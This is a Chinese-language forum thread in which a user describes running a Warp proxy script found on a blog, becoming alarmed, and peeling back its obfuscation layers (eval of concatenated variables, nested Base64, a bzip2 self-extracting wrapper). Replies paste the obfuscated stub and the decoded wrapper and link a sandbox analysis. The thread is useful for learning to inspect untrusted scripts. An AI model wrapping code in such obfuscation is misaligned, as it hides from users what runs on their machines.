执行了一个 shell 脚本，被吓了一跳

请不要在回答技术问题时复制粘贴 AI 生成的内容

This topic created in 734 days ago, the information mentioned may be changed or developed.

开了台虚拟机，本来是想着解锁一下某视频网站的非自制剧观看权限。查了一下大部分都是推荐用 Cloudflare Warp 代理来解锁。这只是开头。

然后我搜索的时候卡看到一个博客写的不错，就按照给出的 Github 地址执行了给出的脚本。执行时使用的是普通用户，不能执行，我就切换到了 root 用户执行脚本。

执行后等待了一会，提示我 “更新依赖时出错，建议重启 SSH 客户端。如果依旧如此建议卸载重装 SSH 客户端” 我看到后很疑惑，这跟 SSH 客户端有什么关系。

我尝试打开最开始执行命令中的连接，看一下脚本运行的步骤。结果，不看不知道，一看吓一跳，打开后整个屏幕都是密密麻麻的字符，仔细看了一眼好像是变量赋值，中间部分有一个 eval 命令读取变量后拼接到一起然后组成一个“明文”脚本。

我看明白后当场就觉得完了，是不是植入挖矿或是其他可执行文件了，要隐藏的这么深。

我尝试写了一个 Python 脚本，解析后我发现，竟然还用 Base64 编码了。还需要解码，我找了一个在线网页进行解码后，这家伙，还是一个套娃，有好几层（命令我会发到第一层评论）。

改了改了 Python 脚本全部解析后，看到了脚本的真实面目。然后发现，竟然还有反转。

脚本在一开始定义了一个 skip 变量，在这个变量指定的地方写的是 "BZh91AY&SYX" 开头的字符，后边全是乱码了。我一看，这不会是把压缩文件放脚本中了吧。我试着使用 tail -n +76 endip.sh | bzip2 -cd > output.sh 仔细查看了脚本，竟然没发现有什么不同。那这“里三层外三层”又是拼接又是下载新脚本的到底是干什么？

shell

脚本

恶意

40 replies 2024-05-11 10:06:58 +08:00

defunct9

May 9, 2024

https://ygkkk.blogspot.com/2022/06/github.html

Moyyyyyyyyyyye

PRO

May 9, 2024

可能是提供这个服务，但是不想让你修改，类似闭源软件吧

proxytoworld

May 9, 2024

https://hybrid-analysis.com/sample/22dde9c5c37e67cb67525dd7391ce651bcaefd3dff55bbdf8c04b8b0f69c4ffa?envirOnmentId=100

DosLee

May 9, 2024

最一开始的脚本内容（因为太长，删除了一部分）

```shell
z="
";IeCz='MTBi';Qz='Cllt';oQCz='RlZH';htz='cFVs';mBCz='STBW';XYz='SlVV';qgBz='a1r';BKBz='bUpY';JYBz='VWRY';ISz='aGtS';vPCz='UFYw';qcBz='a1ZW';iIBz='aERh';enBz='blpX';hDz='dFJr';RiBz='b2FR';Vz='aGlZ';WBBz='dFdN';eJCz='Mk5z';eICz='VlRJ';IWBz='VTJO';RfBz='RVZX';kOCz='R2Ez';Cmz='MjVT';WLCz='WlNX';WOz='VjAx';lQBz='aGti';
eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$z$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$z$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$z$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz"
```

DosLee

May 9, 2024

嵌套 Base64 解码后的脚本

```shell
#!/bin/bash
#
# Encrypted by Rangga Fajar Oktariansyah (Anak Gabut Thea)
#
# This file has been encrypted with BZip2 Shell Exec <https://github.com/FajarKim/bz2-shell>
# The filename '2endip.sh' encrypted at Fri Jan 19 07:09:45 UTC 2024
# I try invoking the compressed executable with the original name
# (for programs looking at their name). We also try to retain the original
# file permissions on the compressed file. For safety reasons, bzsh will
# not create setuid or setgid shell scripts.
#
# WARNING: the first line of this file must be either : or #!/bin/bash
# The : is required for some old versions of csh.
# On Ultrix, /bin/bash is too buggy, change the first line to: #!/bin/bash5
#
# Don't forget to follow me on <https://github.com/FajarKim>
skip=75

tab=' '
nl='
'
IFS=" $tab$nl"

# Make sure important variables exist if not already defined
# $USER is defined by login(1) which is not always executed (e.g. containers)
# POSIX: https://pubs.opengroup.org/onlinepubs/009695299/utilities/id.html
USER=${USER:-$(id -u -n)}
# $HOME is defined at the time of login, but it could be unset. If it is unset,
# a tilde by itself (~) will not be expanded to the current user's home directory.
# POSIX: https://pubs.opengroup.org/onlinepubs/009696899/basedefs/xbd_chap08.html#tag_08_03
HOME="${HOME:-$(getent passwd $USER 2>/dev/null | cut -d: -f6)}"
# macOS does not have getent, but this works even if $HOME is unset
HOME="${HOME:-$(eval echo ~$USER)}"
umask=`umask`
umask 77

bztmpdir=
trap 'res=$?
test -n "$bztmpdir" && rm -fr "$bztmpdir"
(exit $res); exit $res
' 0 1 2 3 5 10 13 15

case $TMPDIR in
/ | */tmp/) test -d "$TMPDIR" && test -w "$TMPDIR" && test -x "$TMPDIR" || TMPDIR=$HOME/.cache/; test -d "$HOME/.cache" && test -w "$HOME/.cache" && test -x "$HOME/.cache" || mkdir "$HOME/.cache";;
*/tmp) TMPDIR=$TMPDIR/; test -d "$TMPDIR" && test -w "$TMPDIR" && test -x "$TMPDIR" || TMPDIR=$HOME/.cache/; test -d "$HOME/.cache" && test -w "$HOME/.cache" && test -x "$HOME/.cache" || mkdir "$HOME/.cache";;
*:* | *) TMPDIR=$HOME/.cache/; test -d "$HOME/.cache" && test -w "$HOME/.cache" && test -x "$HOME/.cache" || mkdir "$HOME/.cache";;
esac
if type mktemp >/dev/null 2>&1; then
bztmpdir=`mktemp -d "${TMPDIR}bztmpXXXXXXXXX"`
else
bztmpdir=${TMPDIR}bztmp$$; mkdir $bztmpdir
fi || { (exit 127); exit 127; }

bztmp=$bztmpdir/$0
case $0 in
-* | */*'
') mkdir -p "$bztmp" && rm -r "$bztmp";;
*/*) bztmp=$bztmpdir/`basename "$0"`;;
esac || { (exit 127); exit 127; }

case `printf 'X\n' | tail -n +1 2>/dev/null` in
X) tail_n=-n;;
*) tail_n=;;
esac
if tail $tail_n +$skip <"$0" | bzip2 -cd > "$bztmp"; then
umask $umask
chmod 700 "$bztmp"
(sleep 5; rm -fr "$bztmpdir") 2>/dev/null &
"$bztmp" ${1+"$@"}; res=$?
else
printf >&2 '%s\n' "Cannot decompress ${0##*/}"
printf >&2 '%s\n' "Report bugs to <[email protected]>."
(exit 127); res=127
fi; exit $res
BZh91AY&SYX _D0mw[m ) #I=S h~M4J zh=@
6 2 dHi0 L 0 ` d LF & 0L C 0 C & 211 ` ( h&h&T)h HS E<M2`C .BEBUUUUUUUUTIHT* HU!JBB9%B R-ydX:*2suLo>},v6| e9 k _ Xhh|='~KRi4 Yв #e ( OZYy hmCm~#FXyK s #4V0c2%Y k~/1 $C" j ~P W.[i!%k#w{ - oh ;9d/* a
GI2e-N_,,E gI: Nt *J; &T!`5}6 n7M e> χ 0 0h&^% T^HiR! | FQ A p p px
KRRey(p]+ P;k{yFl q| >3XIzu/RT/M]'v kcj 0l> 'iUG E '^:v 'Tl"PZ(DCre } QQ DD2
#ě* E+{Ht7PS !j sa=v-z3; d[/_+А\JzLqA""q
Qv KK' Tdo$[#=G"fE5N&Q8wUs,&[ql4k DL0C 7x^ 376F rwoH"u#MZc|xv* n :e4!LV,oWpesrlLZQcp8
g 1%%]I ,B N"-Be$208-6 Eσ5MeFrJ1O=
KNg KpiXI% Mc26bvu]r `mY b de47hXD V%MqvlXXifq67g<W p ǚs # ?a ovS@!|% q OaV e &",k cD:I B.V bVU 7hZ &L0 2 ;fEr`hj :% 1Fl4jk`BfUT, "`XWwV ; kL9X1_.
.Z I rE8PX
```